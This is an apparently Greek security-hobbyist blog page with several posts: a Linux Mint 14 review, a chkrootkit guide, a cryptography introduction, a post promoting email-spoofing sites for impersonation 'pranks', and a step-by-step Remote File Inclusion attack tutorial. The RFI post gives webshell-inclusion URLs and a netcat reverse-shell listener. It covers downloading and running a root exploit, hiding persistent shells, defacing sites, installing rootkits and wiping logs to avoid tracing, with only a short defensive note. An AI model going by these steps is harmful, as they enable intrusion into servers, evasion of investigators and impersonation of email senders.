!ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!

ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!
**** Σε αυτό το blog μερικά από τα άρθρα είναι αναδημοσιεύσεις από άρθρα του διαδικτύου και άλλα είναι προσωπικά tutorial που αναφέρονται σε διάφορα θέματα. Τα παραπάνω έγιναν για ενημέρωση του κοινού και εμπλουτισμό της εκπαιδευτικής διεύρυνσης. Όλα τα άρθρα είναι για εκπαιδευτικούς και μόνο σκοπούς. Δεν φέρω καμία ευθύνη εάν κάποιος αναγνώστης τα χρησιμοποιήσει κακόβουλα. ****

Τετάρτη 27 Φεβρουαρίου 2013

Linux Mint 14 -Cinnamon




Το Linux Mint, έχει αρχίσει να μπαίνει σε μια δική του τροχιά ανάπτυξης η οποία έχει πλέον διαφοροποιηθεί από του Ubuntu και σίγουρα όσο προχωρούν οι εκδόσεις η απόσταση αυτή θα μεγαλώνει.
Πριν ελάχιστες ημερες κυκλοφόρησε η νέα του έκδοση 14 και έχοντας ως επίσημο desktop το Cinnamon, την δοκιμάσαμε και πριν την δούμε καλύτερα πιο κάτω, αξίζει να σημειώσω πως η ταχύτητα και η απόδοση που έχει το Mint, συγκριτικά με αυτή του Ubuntu Unity είναι εμφανής από το πρώτο λεπτό, σε όποιον έχει δει και τις διανομές.
Ειλικρινά, αν δεν το έκανα ο ίδιος, θα αδυνατούσα να πιστέψω πως τρέχει live από ένα usb στικακι.

Δοκιμάζοντας το Linux Mint 14-Nadia

Αφού λοιπόν, κατέβηκε γρήγορα το Linux Mint, το “έκαψα” με το Unetbootin σε κάποιο usb στικακι και το boot-αρα, σε ένα ταπεινό laptop:


To πρώτο desktop που θ’ αντικρίσετε, είναι το παρακάτω:


Το Cinnamon πλέον, είναι ένα πλήρες desktop, χρηστικό και φιλικό υπό την έννοια πως θυμίζει το λεγόμενο κλασσικό desktop που έχουν συνηθίσει και οι περισσότεροι χρήστες.
Με το γνωστό εύχρηστο και κατηγορημένο μενού του Mint, δεν θα δυσκολευτεί κανείς να βρει κάποια εφαρμογή, δεν χρειάζεται να πληκτρολογήσει κάτι, καθώς όλα είναι εκεί εύκολα προσβάσιμα, με ένα-δυο κλικ:


Στο πάνελ υπάρχουν οι γνωστές ενδείξεις για άμεση πρόσβαση. χωρίς να χρειάζεται πλοήγηση σε μενού και υπομενού. Επίσης και συντομεύσεις για βασικές εφαρμογές (Firefox, Τερματικό) και αρχεία, υπάρχουν ήδη στο πάνελ:


Στην παρούσα έκδοση, έχουμε πλέον τον Nemo File Manager,ένα fork του Nautilus που αναπτύσσει η ομάδα του Mint, προκειμένου να επιλύσει τις διάφορες ασυμβατότητες που παρουσιάστηκαν:


Από προεπιλογή έχει δυο διαφορετικές επιφάνειες εργασίας και έχετε πρόσβαση σε αυτές με αιώρηση του κέρσορα σας στην επάνω αριστερή γωνία της οθόνης, ενώ μπορείτε να προσθέσετε, όσες ακόμα επιθυμείτε.
Επίσης μπορείτε να σύρετε παράθυρα από την μια επιφάνεια στην άλλη η και να τα κλείσετε:


Η εναλλαγή ανάμεσα σε εφαρμογές μπορεί να γίνει και με ένα ανανεωμένο,ρυθμιζόμενο και ωραίο Alt-Tab, τ’ οποίο δείχνει προεπισκοπήσεις ανοικτών εφαρμογών και εικονίδια:


Όλες οι γνωστές εφαρμογές είναι ήδη εγκατεστημένες και εύκολα, όπως είπαμε, μπορεί να τις βρει ο καθένας στο μενού:

 


Οι ρυθμίσεις συστήματος οι γνωστές του Gnome, μα στη νέα έκδοση:


Να προσθέσουμε ακόμα πως έχει ανανεωθεί και βελτιωθεί το Mint Softare Manager, τ’ οποίο πλέον χρησιμοποιεί το δικό του apt client και όχι το aptdaemon.
Και βέβαια υπάρχει πλέον ο MDM, o login manager του Mint, ο οποίος είναι ένα fork του παλιοί που υπήρχε στο Gnome 2x.
Εν κατακλείδι, το Linux Mint 14-Cinnamon, είναι ένα πληρέστατο,ταχύτατο και απολύτως φιλικό desktop, τ’ οποίο θα σύστηνα ανεπιφύλακτα σε νέους χρήστες που θέλουν να δοκιμάσουν Linux.
Μα σε κάθε περίπτωση αξίζει να το δει ο καθένας, ιδιαίτερα όσοι βρίσκουν βαρύ και δύσχρηστο το Unity.
Τέλος να πουμε, πως το Mint έχει και μια πολύ καλή ενσωμάτωση του Mate desktop (με ξεχωριστή έκδοση) η οποία “αναβιώνει”, το παλιό κλασσικό Gnome 2x desktop.

Δείτε όλα τα νέα χαρακτηριστικά της έκδοσης 14-Νadia.



(923,8 MB είναι η έκδοση με Cinnamon, επομένως αν δεν το “κάψετε” σε usb, θα χρειαστείτε dvd).

H Ελληνική Κοινότητα του Linux Mint, για υποστήριξη.

Anti-Virus Forensics Tool - Backtrack 5 R3 Tutorial

Γεια σας... Όπως είναι γνωστό σε όλους από τότε που φτιάχτηκαν οι υπολογιστές άρχισαν να δημιουργούνται και ιοί που βλάπτου το κάθε λειτουργικό σύστημα έτσι ώστε να δυσλειτουργεί. Αυτό δεν ισχύει μόνο για το λειτουργικό των windows. Σε όλα τα λειτουργικά υπάρχουν ιοί ακόμα και στα linux η διαφορά είναι ότι κάποια λειτουργικά συστήματα είναι πιο ανθεκτικά σε προσβολές από ιούς. Σε αυτό τον εκπαιδευτικό οδηγό θα αναλύσουμε ένα αρκετά χρήσιμο εργαλείο που υπάρχει στις διανομές των Backtrack 5 και είναι το chkrootkit (Check Rootkit). Υπάρχει ακόμα ένα εργαλείο αλλά αυτό θα αναλυθεί σε επόμενο tutorial. 
Το chkrootkit είναι ένα πρόγραμμα για συστήματα τύπου unix και συγκεκριμένα υπάρχει στη λίστα εργαλείων του backtrack 5 και το οποίο έχει στόχο να βοηθάει τον διαχειριστή να ελέγχει το σύστημα όχι μόνο για τυχόν ιούς αλλά και για δυσλειτουργίες του συστήματος για τυχόν προσβολές του συστήματος από τρίτους κατά την περιήγηση στο ιντερνετ. Είναι να φανταστούμε κάτι όπως το ccleaner των windows αλλά έχει επιπρόσθετο antivirus, antispam κτλ. Αποτελεί ένα πολύ χρήσιμο εργαλείο για κάποιον που ξέρει καλά να χρησιμοποιεί στο έπακρο τις τεράστιες δυνατότητες που παρέχει το backtrack 5 στους χρήστες του.
Παρακάτω θα δείξουμε πώς το χρησιμοποιούμε:

Βήμα 1. Πρώτα απ'όλα ανοίγουμε ένα τερματικό από την επιφάνεια εργασίας του Backtrack 5 R3 και πληκτρολογούμε: cd /pentest/forensics/chkrootkit/
Βήμα 2. Στη συνέχεια πληκτρολογούμε:  ./chkrootkit –help (περιμένουμε λίγο και μας ανοίγει ένα κείμενο με τις εντολές του εν λόγο εργαλείου).



Βήμα 3. Τώρα πληκτρολογόντας την εντολή ./chkrootkit -l στο τερματικό το αφήνουμε να κάνει τεστ.




Βήμα 4. Σε αυτό το βήμα ελέγχουμε αν οι φάκελοι μας στο σύστημα έχουν προσβληθεί από τρίτους. Αυτό γίνεται πληκτρολογόντας τις δυο παρακάτω εντολές
  • ./chkrootkit login
  • ./chkrootkit sshd

Βήμα 5. Για να κάνουμε ένα πλήρες τεστ σε όλο το σύστημα μας πληκτρολογούμε: ./chkrootkit και όπως φαίνεται παρακάτω στις εικόνες γίνεται γενικός έλεγχος και στο τέλος προκύπτει μια λίστα με τα αποτελέσματα.





Τρίτη 26 Φεβρουαρίου 2013

Κάντε πλάκα σε κάποιον φίλο σας στέλνοντας του "ψεύτικο" email




Γειά σε όλους. Στο σημερινό tutorial θα σας δείξω πώς μπορούμε να στείλουμε ένα "ψεύτικο" mail σε κάποιον γνωστό μας και να του κάνουμε πλάκα. Μπορούμε να βάλουμε αποστολέα, mail "θύματος", θέμα, κείμενο κτλ και οτιδήποτε άλλο θέλουμε. Για παράδειγμα θέλω να προσποιηθώ έναν διάσημο και να κάνω πλάκα σε ένα φίλο μου. Γράφω το ψεύτικο mail μου και τα ψεύτικα στοιχεία μου.


H διεύθυνση είναι η παρακάτω: http://emkei.cz/



Επίσης άλλες τρεις σελίδες που μπορούμε να στείλουμε ψεύτικο mail σε κάποιον γνωστό μας και να του κάνουμε πλάκα είναι οι παρκάτω...

sendanonymousemail.net
 

anonymouse.org
 

send-email.org

Εισαγωγή στην Κρυπτογραφία...

Γεια σας... Σε αυτό το εκπαιδευτικό άρθρο θα ασχοληθούμε με την έννοια της κρυπτογραφίας λέγοντας μερικά εισαγωγικά για αυτή την έννοια. Από το μακρινό παρελθόν οι ασφαλές μεταδόσεις πληροφοριών και μηνυμάτων απασχόλησε τους ανθρώπους και εξακολουθούν να τους απασχολούν έως σήμερα δηλ. την μετάδοση πληροφοριών χωρίς να γίνεται αντιληπτή από τρίτους, η εξασφάλιση της δυνατότητας να μην μπορεί να διαβαστεί το μήνυμα στην περίπτωση που η μετάδοση γίνει αντιληπτή καθώς και η απόδειξη της αυθεντικής αποστολής ενός μηνύματος. Τα προβλήματα αυτά, θα εξακολουθούν να υπάρχουν, όσο θα υπάρχουν άνθρωποι που θα προσπαθούν να προστατέψουν τα δικαιώματά τους και κάποιοι που θα προσπαθούν να τα παραβιάσουν.
Στη σύγχρονη εποχή, τα προβλήματα αυτά μεταφέρονται στο χώρο των ψηφιακών δεδομένων. Σύγχρονες υπολογιστικές μηχανές, με υψηλές δυνατότητες επεξεργασίας και αποθήκευσης πληροφοριών, χρησιμοποιούνται τόσο για να εξασφαλίζουν τη νομιμότητα όσο και για να την παρακάμπτουν.
Λόγοι οι οποίοι καθιστούν την ασφάλεια στην ηλεκτρονική επικοινωνία επιτακτική, είναι η ευκολία που παρέχεται μέσω ενός ανοικτού δικτύου, όπως είναι το Internet στην:
  • παρακολούθηση της επικοινωνίας από τρίτους- ωτακουστές (eavesdroppirs)
  • αλλοίωση του περιεχομένου του μεταφερόμενου μηνύματος-ψευδές μήνυμα (fake message)
  • η όχι πάντα δυνατή εξακρίβωση της ταυτότητας των επικοινωνούντων μερών ιδιωτικότητα (privacy) καθιστά πιθανή μία επίθεση πλαστοπροσωπίας (impersonation).
Οι απειλές (threats) ασφάλειας δικτύου χωρίζονται σε δύο κατηγορίες. Οι παθητικές απειλές, που μερικές φορές αναφέρονται ως παρακολούθηση (eavesdropping)τ περιλαμβάνουν απόπειρες από έναν επιτιθέμενο να αποκτήσει πληροφορία σχετικά με το μήνυμα που διακινείται σε μία επικοινωνία. Οι ενεργητικές απειλές περιλαμβάνουν κάποια τροποποίηση των μεταδιδόμενων δεδομένων ή τη δημιουργία ψεύτικων μεταδόσεων.
Το πιο σημαντικό αυτοματοποιημένο εργαλείο, με διαφορά, για ασφάλεια δικτύου και επικοινωνιών είναι η κρυπτογράφηση. Με συμβατική κρυπτογράφηση, τα δύο μέρη μοιράζονται ένα μοναδικό κλειδί κρυπτογράφησης/ αποκρυπτογράφησης. Η κυριότερη πρόκληση με τη συμβατική κρυπτογράφηση είναι η διανομή και η προστασία των κλειδιών. Ένα σχήμα κρυπτογράφησης δημόσιου κλειδιού περιλαμβάνει δύο κλειδιά, ένα για κρυπτογράφηση και ένα για αποκρυπτογράφηση. Το ένα από τα κλειδιά διατηρείται από τον ιδιοκτήτη κρυφό και το άλλο είναι δημόσιο.
Η συμβατική κρυπτογράφηση και η κρυπτογράφηση δημόσιου κλειδιού συχνά συνδυάζονται σε εφαρμογές ασφαλούς διαδικτύωσης. Η συμβατική κρυπτογράφηση χρησιμοποιείται για να κρυπτογραφεί δεδομένα, χρησιμοποιώντας ένα μίας χρήσης ή μικρής διάρκειας κλειδί συνόδου (session key). Το κλειδί συνόδου μπορεί να διανεμηθεί από ένα έμπιστο κέντρο διανομής κλειδιού ή να μεταδοθεί σε κρυπτογραφημένη μορφή χρησιμοποιώντας κρυπτογράφηση δημόσιου κλειδιού. Η κρυπτογράφηση δημόσιου κλειδιού διαθέτει την επιπλέον δυνατότητα να δημιουργεί ψηφιακές υπογραφές, οι οποίες μπορούν να πιστοποιήσουν την πηγή των μεταδομένων μηνυμάτων.

Κρυπτογραφία

Η λέξη κρυπτολογία αποτελείται από την ελληνική λέξη κρύπτο – κρυφός και την λέξη λόγος. Είναι ο τομέας που ασχολείται με την μελέτη της ασφαλούς επικοινωνίας. Ο κύριος στόχος είναι να παρέχει μηχανισμούς για 2 ή περισσότερα μέλη να επικοινωνήσουν χωρίς κάποιος άλλος να είναι ικανός να διαβάζει την πληροφορία εκτός από τα μέλη.

Ιστορική αναδρομή κρυπτογραφίας

Η κρυπτογραφία είχε αρχικά την μορφή τέχνης που τα μυστικά της γνώριζαν λίγοι και εκλεκτοί. Η ιστορία της κρυπτογραφίας ξεκινά περίπου το 4000 π.Χ. στην αρχαία Αίγυπτο περνά στην αρχαία Ελλάδα που έχουμε αναφορές της στο ιστορικό Πολύβιο και συνεχίζεται στον Ιούλιο Καίσαρα. Ο Ιούλιος Καίσαρας επινόησε έναν απλό κρυπτογραφικό αλγόριθμο για να επικοινωνεί με τους επιτελείς του, με μηνύματα που δεν θα ήταν δυνατόν να τα διαβάσουν οι εχθροί του. Ο αλγόριθμος βασιζόταν στην αντικατάσταση κάθε γράμματος του αλφαβήτου με κάποιο άλλο, όχι όμως τυχαία επιλεγμένο. Ο αλγόριθμος κρυπτογράφησης είναι η ολίσθηση των γραμμάτων του αλφαβήτου προς τα δεξιά. Κάθε γράμμα αντικαθίσταται από κάποιο άλλο με κάποιο κλειδί π.χ. 3. ∆ηλαδή, η κρυπτογράφηση ενός μηνύματος γίνεται με αντικατάσταση κάθε γράμματος από το γράμμα που βρίσκεται 3 θέσεις δεξιότερά του στο αλφάβητο. Θα μπορούσε το κλειδί να ήταν ο αριθμός 6, οπότε το κρυπτογραφημένο κείμενο που θα προέκυπτε θα ήταν διαφορετικό. Έτσι, διατηρώντας τον ίδιο αλγόριθμο κρυπτογράφησης και επιλέγοντας διαφορετικό κλειδί παράγονται διαφορετικά κρυπτογραφημένα μηνύματα.

Από την στιγμή που η κρυπτογραφία άρχισε να χρησιμοποιείται για στρατιωτικούς σκοπούς και για απόκρυψη ζωτικής σημασίας πληροφοριών, έπαψε να είναι απόκρυφη τέχνη και έτυχε της μελέτης τόσο αυτών που ήθελαν να αποκρύψουν τα μυστικά τους όσο και από αυτούς που ήθελαν να βρουν τρόπο να αποκαλύψουν τα μυστικά των αντιπάλων τους. Έτσι η κρυπτογραφία πέρασε στο πεδίο της επιστήμης.
Κρυπτογράφοι και κρυπταναλυτές επιδόθηκαν σε έναν ανελέητο συναγωνισμό. Κάθε πρόοδος της κρυπτογραφίας συνοδευόταν από μια αντίστοιχη πρόοδο της κρυπτανάλυσης. Η κρυπτογραφία έγινε χρήσιμο εργαλείο στα χέρια του στρατού των διπλωματών και του κράτους με σκοπό την διαφύλαξη εθνικών μυστικών και στρατηγικών. Όσο πιο πολύτιμα τα μυστικά τόσο πιο μεγάλη αξία αποκτούσε η ασφαλής φύλαξή τους. Στον 20ό αιώνα τα παραδείγματα εκτεταμένης χρήσης κρυπτογραφικών τεχνικών είναι πολλά.
Την περίοδο της ποτοαπαγόρευσης στην Αμερική (δεκαετία του 20-30) το νεοσύστατο τότε σώμα FBI χρησιμοποίησε τεχνικές κρυπτογραφίας για να αποκρύπτει από τη μαφία τους τόπους παράδοσης μεγάλων φορτίων ποτών.
∆εν θα ήταν υπερβολή να πούμε ότι η έκβαση του δευτέρου Παγκοσμίου Πολέμου κρίθηκε υπέρ των συμμάχων εξαιτίας της ικανότητας τους να αποκρυπτογραφούν τα γερμανικά μηνύματα και της ανικανότητας των Γερμανών να πράξουν κάτι ανάλογο με τα συμμαχικά μηνύματα. Είναι γνωστή άλλωστε η ιστορία της μηχανής ENIGMA που χρησιμοποίησαν οι Άγγλοι για να αποκρυπτογραφούν τα μηνύματα του Γερμανικού επιτελείου προς τις αγέλες των υποβρυχίων τους στη Μεσόγειο αλλά και τον Ατλαντικό ωκεανό.
Από την δεκαετία του 60 και μετά η κρυπτογραφία γνώρισε μεγάλη ανάπτυξη λόγω της ραγδαίας ανάπτυξης των υπολογιστών, αλλά και των τηλεπικοινωνιών. Έτσι λοιπόν, υπήρξε η ανάγκη για προστασία δεδομένων σε ψηφιακή μορφή. Αρχίζοντας με την εργασία του Feistel στην IBM στις αρχές της δεκαετίας του '70 και καταλήγοντας το 1977 με την υιοθέτηση του Αμερικανικού ομοσπονδιακού προτύπου για την επεξεργασία των πληροφοριών την κρυπτογράφηση των μη-διαβαθμισμένων πληροφοριών, τον αλγόριθμο DES. Παραμένει μέχρι σήμερα το τυποποιημένο μέσο για την ασφάλεια του ηλεκτρονικού εμπορίου σε πολλά οικονομικά ιδρύματα σε όλο τον κόσμο. Η πιο εντυπωσιακή ανάπτυξη στην ιστορία της κρυπτογραφίας ήρθε το 1976 όταν ο Diffie και ο Hellman δημοσίευσαν το “New directions in cryptography”. Αυτή η επιστημονική δημοσίευση εισήγαγε την επαναστατική έννοια τής κρυπτογραφίας δημοσίου κλειδιού. Παρόλο που οι συγγραφείς δεν έκαναν πρακτική εφαρμογή του σχήματος που πρότειναν, η αρχή είχε γίνει και το θέμα έτυχε μεγάλου ενδιαφέροντος από την κρυπτογραφική κοινότητα.
Το 1978 οι Rivest, Shamir και Adleman ανακάλυψαν την πρώτη πρακτική εφαρμογή του προταθέντος σχήματος. Ήταν το λεγόμενο σχήμα RSA και βασιζόταν σε ένα άλλο δύσκολο μαθηματικό πρόβλημα, αυτό της δυσκολίας παραγοντοποίησης μεγάλων ακεραίων. Όπως ήταν φυσικό οι κρυπταναλυτές σήκωσαν τα μανίκια και άρχισαν να ψάχνουν πιο αποτελεσματικούς τρόπους παραγοντοποίησης. Παρά τις μεγάλες προόδους τους κυρίως την δεκαετία του 80 το RSA παρέμεινε ακόμα ασφαλές! Μια από τις σημαντικότερες προσφορές της κρυπτογραφίας δημοσίου κλειδιού ήταν και η ψηφιακή υπογραφή.

Δευτέρα 25 Φεβρουαρίου 2013

Επιθέσεις R.F.I (Remote File Inclusion)

Σε προηγούμενο tutorial είχαμε αναφέρει γενικά τα είδη των διαδικτυακών επιθέσεων. Σε αυτό λοιπόν το tutorial θα αναλύσουμε με λεπτομέρειες τι είναι το R.F.I, θα πούμε πως γίνεται όπως επίσης θα αναφέρουμε και τρόπους προστασίας.
Η μέθοδος αυτή αφορά την εκτέλεση ενός κακόβουλου προγράμματος (για την ακρίβεια ενός webshell) από έναν μη εξουσιοδοτημένο χρήστη, σε μια ευάλωτη σε αυτού του είδους την επίθεση ιστοσελίδα που φιλοξενείται σε κάποιον server. Το συγκεκριμένο κενό ασφαλείας μας επιτρέπει να συμπεριλάβουμε ό,τι κώδικα θέλουμε στην URL, όπως για παράδειγμα την εκτέλεση ενός webshell.
Στο διαδίκτυο μπορεί να βρει κανείς διάφορα webshells. Με τη χρήση αυτών λοιπόν, πολλές φορές, μπορούμε να εγκαταστήσουμε κάποιο keylogger, trojan, backdoor. Μπορούμε ακόμα και να πάρουμε τον έλεγχο του λειτουργικού συστήματος του σέρβερ δηλαδή να πάρουμε root access (own the box).
Το webshell είναι μια σελίδα γραμμένη σε php ή asp τις περισσότερες φορές (γενικά όμως dynamic pages κτλ.) η οποία δίνει την δυνατότητα στον επιτιθέμενο να δει τα περιεχόμενα των φακέλων του site, να διαχειρίζεται αρχεία (προσθήκη, επεξεργασία, ανέβασμα κτλ) ανάλογα βέβαια πάντα και με τα permissions, κι όπως είπαμε και προηγουμένως ακόμα και να rootarei το box!
Το συγκεκριμένο κενό ασφαλείας οφείλεται στον κακό προγραμματισμό (τι άλλο θα μπορούσε δηλαδή;) κι επεξηγώ... Εάν κοιτάξουμε στον κώδικα του php αρχείου προσεχτικά θα βρούμε σε κάποιο σημείο το εξής καλούδι:

include($page . '.php');
Τι σημαίνει δηλαδή αυτό; Σημαίνει ότι η συνάρτηση include() δέχεται χωρίς κανένα πρόβλημα ό,τι της σερβίρουμε. Μα φυσικά τι άλλο εκτός από το ωραίο, συναρπαστικό αλλά πάνω απ' όλα κακόβουλο (για τον admin, όχι για εμάς) shellaki μας.

Δηλαδή, έχουμε το εξής site:http://www.site.gr/index.php?page=index.php
Εμείς λόγω του κενού αυτού που αναφέραμε, μπορούμε να το τροποποιήσουμε λιγάκι το url, δηλαδή να εκτελέσουμε το εξής:

http://www.site.gr/index.php?

page=http://www.remotewebserver.gr/shell.php

ώστε να το κάνουμε να διαβάζει το shell μας το οποίο έχουμε ανεβάσει σε έναν
remote web server. Επίσης, έχουμε την δυνατότητα να ανεβάσουμε το shell ως .txt αρχείο για να μην μπορούν οι άλλοι να δουν τα περιεχόμενα του δικού μας site.

Εκτελούμε δηλαδή:
http://www.site.gr/index.php?

page=http://www.remotewebserver.gr/shell.txt?

Το ερωτηματικό το βάζουμε για να πούμε στον σέρβερ να διαβάσει το αρχείο shell.txt ως php κι όχι ως txt. Να σημειώσω ότι μερικές φορές το ερωτηματικό δεν επαρκεί για να “ξεγελάσει” το website. Ενδέχεται λοιπόν να πρέπει να προσθέσουμε null bytes για να εκτελεστεί κανονικά.
Αυτό το κάνουμε δίνοντας την εξής εντολή:

http://www.site.gr/index.php?
page=http://www.remotewebserver.gr/shell.txt?

Πως μπορούμε να εντοπίζουμε τέτοιου είδους κενά ασφαλείας;


Τέτοιες αδυναμίες μπορούμε να βρούμε εάν κατέχουμε ορισμένες γνώσεις προγραμματισμού. Συνήθως όμως τις βρίσκουμε με Vulnerability Scanners (nikto, acunetix, darkjumper_script κτλ). Μπορούμε όμως να βρούμε τέτοιου είδους ευάλωτες ιστοσελίδες και μέσω των γνωστών μας google dorks, ακόμα κι από bots που τρέχουν σε IRC Servers.

Πως ελέγχουμε αν είναι όντως ευάλωτο σε R.F.I επιθέσεις το συγκεκριμένο link;


Έχουμε το εξής site:

http://www.site.gr/index.php?page=index.php

Για να ελέγξουμε εάν είναι τρωτό στο συγκεκριμένο bug αντικαθιστούμε το index.php με όποια σελίδα να ‘ναι.
Μπορούμε να κάνουμε δηλαδή το εξής απλό:

http://www.site.gr/index.php?page=www.google.gr

Εάν φορτώσει το google μέσα στη σελίδα μας, τότε σημαίνει ότι το site αυτό είναι ευάλωτο σε αυτού του είδους τις επιθέσεις.Που ανεβάζω το shellaki μου; Προφανώς δεν θα το ανεβάσουμε σε κάποιον δικό μας σέρβερ λόγω tracing. Οπότε, μπορούμε να κάνουμε το εξής απλό και να ανεβάσουμε τα διάφορα shellakia μας σε έναν free host.

Που θα βρούμε έναν τέτοιον;

Υπάρχουν πάρα πολλοί στο διαδίκτυο και με ένα απλό googlarisma βρίσκεις.
Παραδείγμα:

Αφού ανεβάσουμε το shell μας, πάμε να πάρουμε το direct link του αρχείου.
Το link που θα πάρουμε θα είναι της ακόλουθης μορφής:

http://www.speedyshare.com/files/12345678/shell.php
http://www.speedyshare.com/files/12345678/shell.txt

Το direct link στον συγκεκριμένο σέρβερ προκύπει εάν πριν από το όνομα προσθέσουμε download/
Δηλαδή τα direct links είναι το εξής:

http://www.speedyshare.com/files/12345678/download/shell.php
http://www.speedyshare.com/files/12345678/download/shell.txt

Εμείς ανεβάζουμε το shell και ως .php αλλά και ως .txt αρχείο γιατί δεν ξέρεις τι θα βολεύει κάθε φορά (άλλες φορές θα χρησιμοποιούμε το shell κι άλλες το txt).

ΣΗΜΕΙΩΣΗ: Καλό είναι να έχουμε ανεβασμένα 2-3 shells καθώς ορισμένες φορές μπορεί το ένα να μην μπαίνει και να μπαίνει το άλλο. Πολύ καλό shell είναι το storm7shell. Γενικά, να χρησιμοποιείτε shells που διαθέτουν back-connection feature για να μην χρειάζετε να κάνετε upload το netcat εάν επιχειρήσετε να rootarete το box.

Πως μπορούμε να διατηρήσουμε την πρόσβαση μας στο site;


Εάν έχουμε τα κατάλληλα δικαιώματα μπορούμε να ανεβάσουμε το ίδιο το shell στο site. Έτσι θα έχουμε πρόσβαση ανά πάσα στιγμή το επιθυμούμε, όσο το shell θα παραμένει ανεβασμένο στην σελίδα ανεξάρτητα από το εάν έχει διορθοθεί το bug. Φυσικά, δεν το κάνουμε όπως να ‘ναι. Το shell θα το ανεβάσουμε σε ένα απομακρυσμένο directory και με όνομα τέτοιο ώστε να μην κινεί ιδιαίτερα υποψίες, όπως changelog.php, default.php, default_pages.php κλπ.Πως μπορούμε να rootaroume έναν Linux Server με SAFE MODE:OFF.
Καταρχάς, θα χρειαστούμε το NetCat και ένα Local Root Exploit (ανάλογα πάντα βέβαια την έκδοση του server που έχουμε βάλει στο shell). Εφόσον έχουμε ανεβάσει το shell πάμε να μάθουμε πρώτα απ’ όλα ποια είναι η έκδοση του box.
Δίνουμε λοιπόν την εντολή: uname –a
Πάμε τώρα να κάνουμε back-connection μέσω του shell.
Ανοίγουμε το NetCat στον υπολογιστή μας και το προστάζουμε να κάνει listen σε μια συγκεκριμένη θύρα.
Σημείωση: Η θύρα αυτή θα πρέπει να είναι ρυθμισμένη δηλαδή να γίνεται forward από το router και να μην υπάρχει θέμα με το firewall μας (πολύ απλά κλείστε το). Η default port για το storm7shell είναι η θύρα 5992. Γενικά, σε όλα τα shellakia με back-connection features σου γράφουν αυτά σε ποια θύρα πρέπει να κάνεις listen, αν και μπορείς να βάλεις όποια θύρα κάνεις κέφι εσύ. Δίνουμε λοιπόν την εξής εντολή στο NetCat για να ξεκινήσει το listening:
nc -n -l -v -p 5992
NetCat respond: listening on [any] 5992 ...
Στην φόρμα της IP βάζουμε την IP μας. Στην φόρμα της θύρας βάζουμε την θύρα την οποία ανοίξαμε και στην οποία ακούει το NetCat. Εάν πατήσουμε Connect, το shell θα μας απαντήσει:
Now script try connect to port 5992 ...
Εάν οι ρυθμίσεις μας είναι όλες σωστές τότε το NetCat θα μας δώσει το shell του σέρβερ. Συνεχίζουμε τώρα το rooting process. Πρέπει να βρούμε τώρα έναν εγγράψιμο φάκελο με σκοπό να κατεβάσουμε και να κάνουμε compile το Local Root Exploit το οποίο θα μας δώσει root privileges στο box. To exploit εξαρτάται από την έκδοση του kernel του εκάστοτε box. Μερικές φορές τα exploits αυτά δεν δουλεύουν επειδή μπορεί να τα έχουν κάνει patch τα bugs του kernel ή να μην έχουμε τα κατάλληλα permissions.
Μπορούμε να βρούμε εγγράψιμους φακέλους δίνοντας την εντολή:
find / -perm -2 -ls

Μπορούμε να χρησιμοποιήσουμε τον φάκελο /tmp που είναι σίγουρα εγγράψιμος φάκελος. Οπότε δίνουμε την εξής εντολή:
cd /tmp
Για να κατεβάσουμε το local root exploit μπορούμε να χρησιμοποιήσουμε την εντολή wget που είναι για download στο linux.
Για παράδειγμα:
wget http://www.remotewebhost.gr/rootexploit.c
Αφού κατεβάσουμε το exploit πρέπει να το κάνουμε compile. Όμως, πριν κάνουμε το compile θα πρέπει να διαβάσουμε τυχόν οδηγίες που παρέχονται. Για το exploit με όνομα ‘rootexploit’ πρέπει να γράψουμε:
gcc rootexploit.c -o rootexploit
Τώρα λοιπόν κάναμε το rootexploit εκτελέσιμο. Για να τρέξουν ορισμένα exploits χρειαζόμαστε ένα πολύ μεγάλο αρχείο στο δίσκο προκειμένου να τρέξει κανονικά και να πάρουμε root access (πχ. το h0llyshit exploit). Δεν θέλουν όμως όλα (ίσως λίγα μόνο θέλουν), οπότε θα πρέπει να το ψάξετε λίγο το συγκεκριμένο θέμα. Πρέπει να δημιουργήσουμε ένα μεγάλο αρχείο στο /tmp ή σε κάποιον άλλον εγγράψιμο φάκελο.
Η εντολή είναι:
dd if=/dev/urandom of=largefile count=2M
Όπου largefile είναι το όνομα του αρχείου. Θα χρειαστεί να περιμένουμε 2-3 λεπτά μέχρι να δημιουργηθεί ο φάκελος. Εάν η εντολή αποτύχει, μπορούμε να δοκιμάσουμε την εξής εντολή:
dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
Τώρα, μπορούμε να προχωρήσουμε στο τελευταίο στάδιο το οποίο είναι να τρέξουμε το exploit. Δίνουμε λοιπόν την εξής εντολή:
./rootexploit largefile
ή εάν είμαστε σε διαφορετικό εγγράψιμο φάκελο και το largefile έχει δημιουργηθεί στο φάκελο /tmp δίνουμε την εξής εντολή:
./rootexploit /tmp/largefile
Εάν το exploit δεν απαιτεί την παραπάνω διαδικασία, απλά δίνουμε την εξής εντολή:
./rootexploit
Εάν δεν παρουσιαστούν σφάλματα (γιατί όπως είπαμε μπορεί να έχει εγκατασταθεί κάποιο patch για τον kernel κτλ) θα γίνουμε root. Για να ελέγξουμε σίγουρα εάν γίναμε root πατάμε την εντολή:
whoami
Με την εντολή αυτή βλέπουμε το όνομα του χρήστη μας. Οπότε εάν δούμε root, τα καταφέραμε. Τώρα που γίναμε root μπορούμε να κάνουμε mass deface όλα τα sites του σέρβερ ή να εγκαταστήσουμε ένα rootkit (πχ. SSHDoor) και να πάρουμε ssh/telnet shell access στον σέρβερ. Όταν παίρνουμε access στο box θα πρέπει να σβήνουμε και τα logs ώστε να αποφεύγουμε το tracing. Αυτό μπορεί να επιτυγχανθεί με έναν log cleaner. Δεν θα δώσω tips κλπ γι’ αυτό μιας και είναι μια άλλη μεγάλη ιστορία από μόνο του.

Τρόποι Προστασίας


Η βασική αιτία που συμβαίνουν οι επιθέσεις αυτές οφείλεται στο configuration της γλώσσας PHP στον εκάστοτε server η οποία έχει «σεταριστεί» έτσι ώστε να επιτρέπει την κλήση προγραμμάτων από άλλα sites.
Μια λύση για να μην μπορεί κάποιος να «τρέξει» απομακρυσμένο κώδικα στο site μας, είναι να δώσουμε συγκεκριμένες τιμές σε κάποιες μεταβλητές περιβάλλοντος της γλώσσας PHP, μέσα στο αρχείο PHP.INI (http://www.php.net/manual/en/ini.php):
  • allow_url_fopen = false
